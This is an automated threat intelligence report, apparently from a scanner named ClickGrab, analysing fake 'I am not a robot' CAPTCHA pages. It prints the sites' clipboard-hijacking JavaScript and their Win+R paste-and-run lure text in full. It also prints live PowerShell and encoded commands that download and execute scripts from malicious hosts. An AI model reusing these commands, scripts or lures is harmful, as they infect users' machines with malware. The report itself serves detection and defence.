Threat Intelligence Report

📅 September 22, 2025 🕒 Generated: 2025-09-22 02:23:40 🔍 Sites Analyzed: 15
🌐
15
Total Sites Analyzed
⚠️
4
Malicious Sites
27.0% detection rate
💻
8
PowerShell Commands
📋
15
Clipboard Hijacks
📊
84
Avg Threat Score

Attack Pattern Analysis

6
High Risk Commands
4
Base64 Encoded
1
Obfuscated JS
8
Inline JS Redirects
0
External JS Chains
0
Redirect Follows
PowerShellCommands 8
EncodedPowerShell 0
ClipboardManipulation 12
ObfuscatedJavaScript 1
Base64Strings 4
JavaScriptRedirects 8
JavaScriptRedirectChains 0
RedirectFollows 0
CaptchaElements 15

Top Indicators/Keywords

CAPTCHA Verification (3) I am not a robot (3) Robot (3) robot (3) Verification (3) verification-id (3) verification_id (3) hidden (3) verification (2) To better prove you are not a robot (2)

Malicious Sites Detected

Click on a site to view detailed analysis
3
powershell
5
clipboard
7
captcha
3
base64
3
high risk commands

💻 PowerShell Commands 3

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing)
iwr

🔍 Suspicious Keywords 13

CAPTCHA Verification
Verification ID
I am not a robot
robot
Robot
Verification
verification
verification-id
verification_id
Verify You Are Human

🌐 Extracted URLs 2

https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 4 entries (truncated for performance)

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
...k", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "0"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "✠''I am not a robot - reCAPTCHA Verification ID: " const end = "''" const textToCopy = commandToRun setClipboardCopyData(textToCopy); } function showVerifyWindow() {...
3
powershell
5
clipboard
1
downloads
4
captcha
2
high risk commands

💻 PowerShell Commands 3

powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\"";
powershell " + htaPath;
iwr

🔍 Suspicious Keywords 13

CAPTCHA Verification
Verification Hash
I am not a robot
Robot
robot
Verification
verification
verification-id
verification_id
To better prove you are not a robot

🌐 Extracted URLs 5

https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
https://www.google.com/intl/en/policies/privacy/
https://www.google.com/intl/en/policies/terms/
https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1

📋 Clipboard Manipulation Code

Showing first 2 of 4 entries (truncated for performance)

...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextA...
...ck", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "21px 0 0 12px"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "✠''I am not a robot - reCAPTCHA Verification Hash: " const end = "''" const textToCopy = commandToRun + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); } function showVerifyWindow()...
2
powershell
1
obfuscation
1
base64
1
high risk commands

💻 PowerShell Commands 2

documentElement.innerHTML
powershell -win mini -enc YwB1AHIAbAAuAGUAeABlACAAaAB0AHQAcAA6AC8ALwAxADcAMQAuADIAMgAuADEANgAuADEAMwA0AC8AYgBvAG8AawB2AGkAdABhAC4AdAB4AHQAIAB8ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuAA==");

🔐 Obfuscated JavaScript

Showing first 1 of 1 entries (truncated for performance)

{'script': '\r\nif (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini|Mobile|Tablet/i.test(navigator.userAgent) || window.innerWidth < 768) {\r\nwindow.s...', 'indicators': [{'pattern': 'var\\s+_0x[a-f0-9]{4,6}\\s*=', 'examples': ['var _0x2BA3=', 'var _0x8820='], 'count': 3}, {'pattern': '_0x[a-f0-9]{4,6}\\[.*?\\]', 'examples': ['_0x2BA3[_idx]'], 'count': 1}, {'pattern': 'var\\s+_0x[a-f0-9]{2,8}\\s*=', 'examples': ['var _0x2BA3=', 'var _0x8820='], 'count': 3}], 'score': 7, 'position': 100}
5
clipboard
4
captcha

🔍 Suspicious Keywords 10

CAPTCHA Verification
Verification ID
I am not a robot
Robot
robot
Verification
verification-id
verification_id
hidden
mshta

🌐 Extracted URLs 4

https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
https://www.google.com/intl/en/policies/privacy/
https://www.google.com/intl/en/policies/terms/

📋 Clipboard Manipulation Code

Showing first 2 of 4 entries (truncated for performance)

...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextA...
...ck", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "21px 0 0 12px"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "✠''I am not a robot - reCAPTCHA Verification ID: " const end = "''" const textToCopy = commandToRun + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); } function showVerifyWindow()...

Technical Analysis

ClickGrab Threat Analysis Report - 2025-09-22

Generated on 2025-09-22 02:23:41

Executive Summary

  • Total sites analyzed: 15
  • Sites with malicious content: 4
  • Unique domains encountered: 7
  • Total URLs extracted: 34
  • PowerShell download attempts: 1
  • Clipboard manipulation instances: 12

Domain Analysis

Most Frequently Encountered Domains

  • www.webgo.de: 10 occurrences
  • godprox.cc: 8 occurrences
  • www.google.com: 7 occurrences
  • t.me: 4 occurrences
  • use.fontawesome.com: 3 occurrences
  • irp.cdn-website.com: 1 occurrences
  • www.1c-bitrix.ru: 1 occurrences

URL Pattern Analysis

reCAPTCHA imagery

3 occurrences across 1 distinct URLs

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (3 times)

Font resources

3 occurrences across 1 distinct URLs

  • https://use.fontawesome.com/releases/v5.0.0/css/all.css (3 times)

CDN hosted scripts

1 occurrences across 1 distinct URLs

  • https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 times)

Google resources

7 occurrences across 3 distinct URLs

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (3 times)
  • https://www.google.com/intl/en/policies/privacy/ (2 times)
  • https://www.google.com/intl/en/policies/terms/ (2 times)

Suspicious Keyword Analysis

Total Keywords Found: 36 (16 unique)

Keyword Categories

Social Engineering

12 unique keywords

  • Verification
  • I am not a robot
  • Verification ID
  • verification
  • Robot
  • verification-id
  • Verify You Are Human
  • verification_id
  • CAPTCHA Verification
  • To better prove you are not a robot
  • ...and 2 more

Verification Text

2 unique keywords

  • Hidden
  • hidden

Technical Terms

2 unique keywords

  • mshta
  • iex

Most Frequent Keywords

  • CAPTCHA Verification: 3 occurrences
  • I am not a robot: 3 occurrences
  • Robot: 3 occurrences
  • robot: 3 occurrences
  • Verification: 3 occurrences
  • verification-id: 3 occurrences
  • verification_id: 3 occurrences
  • hidden: 3 occurrences
  • verification: 2 occurrences
  • To better prove you are not a robot: 2 occurrences
  • iex: 2 occurrences
  • Verification ID: 2 occurrences
  • Verification Hash: 1 occurrences
  • Hidden: 1 occurrences
  • Verify You Are Human: 1 occurrences

Similar Keyword Patterns

Groups of keywords that appear to be variations of the same theme:

Group 1: CAPTCHA Verification, Verification, verification

Group 2: Verification Hash, verification-id, verification_id, Verification ID

Group 3: Robot, robot

Group 4: Hidden, hidden

JavaScript Obfuscation Analysis

Obfuscation Sophistication Score: 0/7

Potential Base64 Encoded Content

These strings may contain encoded malicious payloads:

  • com/recaptcha/about/images/reCAPTCHA

Clipboard Manipulation Analysis

Detected clipboard manipulation in 12 instances.

Document.Execcommand Copy

Found in 9 snippets (75.0% of clipboard code)

Examples:

document.execCommand("copy")

Textarea Manipulation

Found in 9 snippets (75.0% of clipboard code)

Examples:

ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"

Complete Malicious Functions

Function 1:

function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }

Clipboard Attack Flow Analysis

Attack Sophistication: 6/7 components detected Total Technique Instances: 40

Attack Flow Components

The following components show how the clipboard attack is executed:

Element Creation

Creating temporary DOM elements

Instances: 3 Examples: createElement("textarea"

Content Injection

Injecting malicious content into elements

Instances: 4 Examples: .value =, .textContent =

DOM Manipulation

Adding elements to the DOM

Instances: 9 Examples: body.append, append(

Selection Methods

Selecting content for copying

Instances: 9 Examples: .select()

Clipboard Operations

Executing clipboard copy operations

Instances: 9 Examples: execCommand("copy"

Cleanup Operations

Removing temporary elements

Instances: 6 Examples: removeChild

Malicious Payload Construction

How the final clipboard payload is assembled:

Command Concatenation

Instances: 2 Examples: - commandToRun +

Verification Text

Instances: 1 Examples: - "copy"); document.body.removeChild(tempTextA... ...ck", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "21px 0 0 12px"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "✠''I am not a robot - reCAPTCHA Verification Hash: " const end = "''" const textToCopy = commandToRun + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); } function showVerifyWindow()... ...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy");... ...32.ps1 | iex' -WindowStyle Hidden\""; const commandToRun = "powershell " + htaPath; stageClipboa... ...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText... ...k", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "0"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "✠''I am not a robot - reCAPTCHA Verification ID: " const end = "''" const textToCopy = commandToRun setClipboardCopyData(textToCopy); } function showVerifyWindow() {... ...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy");... ...cation-id').textContent = verification_id; const commandToRun =POWerShEll -W h "[Text.Encoding]::UTF8.GetString... ...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextA... ...ck", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "21px 0 0 12px"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "✠''I am not a robot - reCAPTCHA Verification ID: " const end = "''" const textToCopy = commandToRun + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); } function showVerifyWindow()... ...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy");... ...ocation.origin + "/recaptcha-verify"; const commandToRun = "mshta " + htaPath stageClipboard(com... ...="" id="spinner">

Complete these Verification Steps

To better prove you are not a robot, please:

  1. Press & hold the Windows Key + R.
  2. In the verification window, press Ctrl + V.
  3. Press Enter on your keyboard to finish.

You will observe and agree:
✠"I am not a robot - reCAPTCHA Verification Hash: 1110"

<footer class="verify-container verif...

I'm not a robot

...

Verify You Are Human

Please verify that you are a human to continue.

Complete these Verification Steps

To better prove you are not a robot, please:

  1. Press & hold the Windows Key + R.
  2. In the verification window, press Ctrl + V.
  3. Press Enter on your keyboard to finish.

You will observe and agree:
✠"I am not a robot - reCAPTCHA Verification ID: 146820"

Perform the steps above to finish verification. \
\Verify You Are Human\ \

Verify You Are Human\

\

I'm not a robot\

\ ...="" id="spinner">
完成这些 验证步骤

为了更好的证明您不是机器人,请:

  1. 按住Windows键 + R。
  2. 在验证窗口中,按 Ctrl + V。
  3. 按下键盘上的 Enter 键完成。

您将遵守并同意:
✠"I am not a robot - reCAPTCHA Verification ID: 146820"

<footer class="verify-container verif...

I'`

Hash Generation

Instances: 1 Examples: - verification_id){ const suffix = " # " const ploy = "✠''I am not a robot - reCAPTCHA Verification Hash: " const end = "''" const textToCopy = commandToRun + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); } function showVerifyWindow()... ...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy");... ...32.ps1 | iex' -WindowStyle Hidden\""; const commandToRun = "powershell " + htaPath; stageClipboa... ...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText... ...k", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "0"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "✠''I am not a robot - reCAPTCHA Verification ID: " const end = "''" const textToCopy = commandToRun setClipboardCopyData(textToCopy); } function showVerifyWindow() {... ...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy");... ...cation-id').textContent = verification_id; const commandToRun =POWerShEll -W h "[Text.Encoding]::UTF8.GetString... ...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextA... ...ck", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "21px 0 0 12px"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "✠''I am not a robot - reCAPTCHA Verification ID: " const end = "''" const textToCopy = commandToRun + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); } function showVerifyWindow()... ...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy");... ...ocation.origin + "/recaptcha-verify"; const commandToRun = "mshta " + htaPath stageClipboard(com... ...="" id="spinner">

Complete these Verification Steps

To better prove you are not a robot, please:

  1. Press & hold the Windows Key + R.
  2. In the verification window, press Ctrl + V.
  3. Press Enter on your keyboard to finish.

You will observe and agree:
✠"I am not a robot - reCAPTCHA Verification Hash: 1110"

<footer class="verify-container verif...

I'm not a robot

...

Verify You Are Human

Please verify that you are a human to continue.

Complete these Verification Steps

To better prove you are not a robot, please:

  1. Press & hold the Windows Key + R.
  2. In the verification window, press Ctrl + V.
  3. Press Enter on your keyboard to finish.

You will observe and agree:
✠"I am not a robot - reCAPTCHA Verification ID: 146820"

Perform the steps above to finish verification. \
\Verify You Are Human\ \

Verify You Are Human\

\

I'm not a robot\

\ ...="" id="spinner">
完成这些 验证步骤

为了更好的证明您不是机器人,请:

  1. 按住Windows键 + R。
